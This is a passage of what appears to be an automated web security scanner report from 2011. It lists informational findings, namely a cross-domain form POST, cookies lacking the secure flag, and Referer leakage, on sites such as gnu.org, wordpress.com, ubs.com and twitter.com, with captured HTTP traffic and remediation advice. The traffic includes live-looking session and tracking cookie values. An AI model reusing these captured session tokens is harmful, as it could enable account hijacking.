Email / Affiliate ID:&nbsp;&nbsp;
<input name="DL_AUTH_USERNAME" type="text" class="login-text">
...[SNIP]...

11.2. http://www.gnu.org/licenses/gpl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The page contains a form which POSTs data to the domain crm.fsf.org. The form contains the following fields:

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:22 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:21:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
</p>
    <form action="https://crm.fsf.org/civicrm/profile/create&amp;reset=1&amp;gid=31" method="post">
<div>
...[SNIP]...

12. SSL cookie without secure flag set
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


12.1. https://wordpress.com/wp-login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wordpress.com
Path:   /wp-login.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-login.php HTTP/1.1
Host: wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Jul 2011 11:21:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: hiab=on; path=/; domain=.wordpress.com
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.wordpress.com
Content-Length: 3666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <meta
...[SNIP]...

12.2. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif?dcsdat=1309960265581&dcssip=www2.ubs.com&dcsuri=%2F1%2Fssl%2Fe%2Fcontact%2Fcontact.html&dcsqry=%3FNavLB_Www%3D1309960260&dcsref=http%3A%2F%2Fwww.ubs.com%2F&WT.co_f=14.96.190.152-2611613264.30161891&WT.vt_sid=14.96.190.152-2611613264.30161891.1309960204815&WT.tz=-5&WT.bh=8&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=UBS%20-%20General%20contact%20and%20feedback%20form&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1057x822&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.5.0&WT.dl=0&WT.ssl=1&WT.es=www2.ubs.com%2F1%2Fssl%2Fe%2Fcontact%2Fcontact.html&WT.UBS.lp=en&WT.vt_f_tlh=1309960237 HTTP/1.1
Host: www.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAC5oFE4OaBROAQAAAAEAAAAuaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981865583:ss=1309981804815

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:07 GMT
Server: Apache
Set-Cookie: ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAEtoFE4OaBROAQAAAAEAAABLaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--; Max-Age=315360000; Expires=Sat, 03-Jul-2021 13:51:07 GMT; Path=/; Version=1; HttpOnly
ETag: "0e92d9a760c71:2f23"
Last-Modified: Wed, 07 Mar 2007 11:00:42 GMT
X-Powered-By: ASP.NET
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: image/gif
Connection: close
Content-Length: 43

GIF89a.............!.......,...........D..;

12.3. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/njs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /7/dcs6nkwvw00000ouf3tc69cst_8i5h/njs.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /7/dcs6nkwvw00000ouf3tc69cst_8i5h/njs.gif HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Apache
Set-Cookie: ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAJ9pFE4OaBROAQAAAAEAAACfaRRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--; Max-Age=315360000; Expires=Sat, 03-Jul-2021 13:56:47 GMT; Path=/; Version=1; HttpOnly
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 11:00:42 GMT
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 43
Accept-Ranges: bytes
ETag: "0e92d9a760c71:2f23"
X-Powered-By: ASP.NET
Connection: close

GIF89a.............!.......,...........D..;

13. Cross-domain Referer leakage
There are 13 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


13.1. http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web HTTP/1.1
Host: social.zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940283855:ss=1309940283855; lastCulture=en-US

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: ec73cbe3-4917-444b-8d6c-93f60f1a09fb,848807
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Content-Length: 30161
Cache-Control: no-cache, no-store
Expires: Wed, 06 Jul 2011 11:19:49 GMT
Date: Wed, 06 Jul 2011 11:19:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
<span><a class="twitter-share-button" data-count="horizontal" href="http://twitter.com/share">Tweet</a></span>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<li><a href="http://privacy.microsoft.com/en-US/default.aspx" target="_blank">Privacy Statement</a>
...[SNIP]...
<li><a href="http://www.microsoft.com/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx" target="_blank">Trademarks</a>
...[SNIP]...
<li><a href="http://zuneinsider.com/" target="_blank">Zune Insider</a>
...[SNIP]...
<li><a href="http://www.microsoftaffiliates.com/index.html?content=Zune" target="_blank">Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.facebook.com/zune" onclick="window.open(this.href);return false;" onkeypress="window.open(this.href);return false;"><img alt="Image: Facebook" height="16" src="https://www.zune.net/NR/rdonlyres/CD7A2D12-EE37-468B-B1A4-82DECA1F3B8C/0/ico_facebook.png" width="15" /></a> <a href="http://www.myspace.com/zune" onclick="window.open(this.href);return false;" onkeypress="window.open(this.href);return false;"><img alt="Image: MySpace" height="16" src="https://www.zune.net/NR/rdonlyres/D8108120-F1EF-4A43-A955-533A33308329/0/ico_myspace.png" width="15" /></a> <a href="http://www.twitter.com/zune" onclick="window.open(this.href);return false;" onkeypress="window.open(this.href);return false;"><img alt="Image: Twitter" height="16" src="https://www.zune.net/NR/rdonlyres/9BCAAEF1-B5A9-4F19-B31B-7691F0EB2344/0/ico_twitter.png" width="15" /></a> <a href="http://www.youtube.com/zune" onclick="window.open(this.href);return false;" onkeypress="window.open(this.href);return false;"><img alt="Image: YouTube" height="16" src="https://www.zune.net/NR/rdonlyres/F6FCB448-562F-4CF8-A9B3-D292A6701535/0/ico_youtube.png" width="15" />
...[SNIP]...
<param name="initparams" value="hostname=queueControl,zunetag=" />
<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none;">
<img src="http://go.microsoft.com/fwlink/?LinkId=108181" alt="Get Microsoft Silverlight"
style="border-style: none" />

</a>
...[SNIP]...
&#64;latin,DashboardGenreListText=Rock&#64;Hip Hop&#64;R&#38;B &#47; Soul&#64;Pop&#64;Electronic &#47; Dance&#64;Latin,isSubscriptionAvailable=True"
name="initparams" />
<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none;
display: block; width: 100%; height: 100%; background: #fff;">

<img src="http://social.zune.net/xweb/lx/pic/dash_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none" />
...[SNIP]...
<noscript><img alt="" border="0" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsqv1k1u100004v2eennc1xv_9v6o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" /></noscript>
...[SNIP]...

13.2. http://social.zune.net/xweb/lx/js/zpagescripts.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /xweb/lx/js/zpagescripts.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /xweb/lx/js/zpagescripts.js?ver=11032080 HTTP/1.1
Host: social.zune.net
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940283855:ss=1309940283855; lastCulture=en-US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 07:12:10 GMT
Accept-Ranges: bytes
ETag: "0175929813cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 237480
Cache-Control: max-age=0
Date: Wed, 06 Jul 2011 11:20:02 GMT
Connection: close
Vary: Accept-Encoding

(function(c){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var d=function(g){var f="";for(var j=0;j<g.length;j++){var h=g.charCodeAt(j);if(h<128){f+=String.fromCharCode(h)}
...[SNIP]...
';var d=this.getParams();for(var a in d){b+=[a]+'="'+d[a]+'" '}var c=this.getVariablePairs().join("&");if(c.length>0){b+='flashvars="'+c+'"'}b+="/>"}else{this.addVariable("MMplayerType","ActiveX");b='<object codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,115,0" id="'+this.getAttribute("id")+'" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="'+this.getAttribute("width")+'" height="'+this.getAttribute("height")+'" style="'+this.getAttribute("style")+'">';b+='<param name="movie" value="'+this.getAttribute("swf")+'" />
...[SNIP]...
nitParams" name="initParams" value="autostart=false,muted=False,captions=True,markers=True,isexplicitandischild='+isExplicitAndIsChild+",signinrequired="+signinRequired+",m="+videoPath+'" />');a.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none; display: block; background: #fff; width: 500px; height: 292px; text-align: center;">');a.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none; margin-top: 39px;"/>
...[SNIP]...
<param name="initParams" name="initParams" value="'+d+'" />');a.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none; display: block; background: #fff; width: 660px; height: 400px; text-align: center;">');a.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none; margin-top: 93px;"/>
...[SNIP]...
<br/>'+LocStr.lxUtilResources.PodcastReportAConcernFooterText+'<a target="_blank" href="http://www.microsoft.com/info/cpyrtinfrg.htm">http://www.microsoft.com/info/cpyrtinfrg.htm</a>
...[SNIP]...
<param name="initParams" value="'+initParams+'" />');html.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration:none;display:block;background:#fff;width:500px;height:292px;text-align:center;margin:0 auto;">');html.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style:none;margin-top:39px;"/>
...[SNIP]...

13.3. http://support.microsoft.com/contactus/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.microsoft.com
Path:   /contactus/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /contactus/?ws=mscom HTTP/1.1
Host: support.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=i1uamGByzAEkAAAAMTE3OGIyZjAtODU1YS00ODkyLWJjMWQtZTk0ZGYwZTUxNTczA8yEsKPgt2O1DtENnBnnqhS55ao1; expires=Tue, 13-Sep-2011 22:00:48 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B06
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Wed, 06 Jul 2011 11:20:48 GMT
Connection: close
Content-Length: 43442

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="cu_selector" /><meta name="DCSext.sup_cln" content="en-us" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCSext.sup_ln" content=
...[SNIP]...
<img src="/library/images/support/CN/CPS_IE9_icon.png" alt="Get Internet Explorer 9 today. Free download." /> <a href="http://clk.atdmt.com/MRT/go/335774571/direct/01/">Get Internet Explorer 9 today. Free download.</a>
...[SNIP]...
</a>
<a id="ad_brnd_corpflyoutad_go" href="http://clk.atdmt.com/MRT/go/335774571/direct/01/">
<img src="/library/images/support/en-US/IE9_btn-up.png" alt="" onmouseover="this.src='/library/images/support/en-US/IE9_btn-hov.png';" onmouseout="this.src='/library/images/support/en-US/IE9_btn-up.p
...[SNIP]...
<li class="gsfx_brnd_LocalLink"><a href="http://www.microsoftstore.com/store/msstore/home?WT.mc_id=SMCBAR_ENUS_ADR_BUYALL" id="L_195944"><span>
...[SNIP]...
<strong><a href="http://support.xbox.com/">Contact Xbox Support</a>
...[SNIP]...
<strong><a href="http://www.zune.net/en-US/support">Contact Zune Support</a>
...[SNIP]...
<strong><a href="http://explore.live.com/windows-live-help-center">Windows Live Support</a>
...[SNIP]...
<strong><a href="http://support.msn.com/">MSN Support</a>
...[SNIP]...
<strong><a href="https://admin.innotrac.com/Microsoft/ics/">Check the Status of your Replacement order</a>
...[SNIP]...
<strong><a href="https://microsoft.young-america.com/Lookup.aspx">Check the Status of your Rebate</a>
...[SNIP]...
<strong><a href="http://www.microsoftstore.com/store/msstore/home?WT.mc_id=SMCCNT_ENUS_TEXT_BUY">Microsoft Store Online</a>
...[SNIP]...
<strong><a href="http://marketplace.xbox.com">Xbox LIVE Marketplace</a>
...[SNIP]...
<strong><a href="http://www.zune.net/en-us/products/learningcenter/zunemarketplace/default.htm">Zune Marketplace</a>
...[SNIP]...
<noscript><img alt="" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No" /></noscript>
...[SNIP]...

13.4. http://twitter.com/intent/session

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /intent/session?return_to=%2Fintent%2Ftweet%3Fsource%3Dwebclient%26text%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx&source=webclient&text=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; k=173.193.214.243.1309445969207029; guest_id=v1%3A13086187569807267; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--68bfb23ecb75192721faa31141f4cc93644031bd

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309950927-60253-54088
ETag: "36b99243bfb315e43cf77ffb34f0123a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:15:27 GMT
X-Runtime: 0.01137
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8d1959539e4fb4977e5ce9becc49dc0a878abe53
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 4344
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width; initial-scale=1.0;
...[SNIP]...
</title>

<link href="http://a0.twimg.com/a/1309899422/phoenix/css/tfw.bundle.css" media="screen" rel="stylesheet" type="text/css" />
<!--[if (IEMobile) & (lt IE 9)]>
...[SNIP]...
</script>

<script src="http://a1.twimg.com/a/1309899422/javascripts/loadrunner.js" data-main="tfw/intents/main" data-path="http://a1.twimg.com/a/1309899422/javascripts/modules" type="text/javascript"></script>
...[SNIP]...

13.5. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=presspass%20controls&qsc0=0&FORM=BMME HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=B1549D9132CF43DB9C0083ED224302D8; domain=.bing.com; path=/
Set-Cookie: MUID=E66C4FBB1F654227B7791E57B71ACE3C; expires=Fri, 05-Jul-2013 11:20:46 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=E66C4FBB1F654227B7791E57B71ACE3C%2cc6677c8aca3745ff845f289943d4ca46; expires=Fri, 05-Jul-2013 11:20:46 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=BMME; expires=Fri, 05-Jul-2013 11:20:46 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=057CEF80CDCE41578008FF1313A56DBC; expires=Fri, 05-Jul-2013 11:20:46 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:46 GMT; domain=.bing.com; path=/
Content-Length: 36088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://www.microsoft.com/presspass/press/1996/aug96/cntrlpdpr.mspx" onmousedown="return si_T('&amp;ID=SERP,5046.1')">Microsoft Announces Immediate Availability of ActiveX <strong>
...[SNIP]...
<h3><a href="http://www.microsoft.com/presspass/features/2003/dec03/12-17SoxComplianceQA.mspx" onmousedown="return si_T('&amp;ID=SERP,5063.1')">New Microsoft Offering to Help Address Sarbanes-Oxley Compliance ...</a>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/ActiveX_control" onmousedown="return si_T('&amp;ID=SERP,5098.1')">ActiveX - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#ActiveX_controls" onmousedown="return si_T('&amp;ID=SERP,5079.1')">ActiveX <strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#History" onmousedown="return si_T('&amp;ID=SERP,5080.1')">History</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#ActiveX_in_non-IE_applications" onmousedown="return si_T('&amp;ID=SERP,5081.1')">ActiveX in non-IE ...</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#Other_ActiveX_technologies" onmousedown="return si_T('&amp;ID=SERP,5082.1')">Other ActiveX ...</a>
...[SNIP]...
<h3><a href="http://www.obout.com/" onmousedown="return si_T('&amp;ID=SERP,5147.1')">obout - Home</a>
...[SNIP]...
<h3><a href="http://www.duluthnewstribune.com/event/article/id/201169/" onmousedown="return si_T('&amp;ID=SERP,5165.1')">Duluth News Tribune | Duluth, Minnesota</a>
...[SNIP]...
<h3><a href="http://www.duluthnewstribune.com/event/article/id/168474/" onmousedown="return si_T('&amp;ID=SERP,5183.1')">Duluth News Tribune | Duluth, Minnesota</a>
...[SNIP]...
<h3><a href="http://www.inforum.com/event/article/id/307004/" onmousedown="return si_T('&amp;ID=SERP,5201.1')">INFORUM | Fargo, ND</a>
...[SNIP]...
<h3><a href="http://www.inforum.com/event/article/id/306876/" onmousedown="return si_T('&amp;ID=SERP,5219.1')">INFORUM | Fargo, ND</a>
...[SNIP]...
<h3><a href="http://onlinecredentials.com/PressPass.htm" onmousedown="return si_T('&amp;ID=SERP,5235.1')">OnlineCredentials.com\<strong>
...[SNIP]...
<h3><a href="http://www.dglobe.com/event/article/id/49101/" onmousedown="return si_T('&amp;ID=SERP,5253.1')">Worthington Daily Globe | Worthington, Minnesota</a>
...[SNIP]...
</span><a href="http://go.microsoft.com/?linkid=9771044" class="sn_link" tabindex="0" onmousedown="return si_T('&amp;ID=SERP,5311.1')"><span>
...[SNIP]...
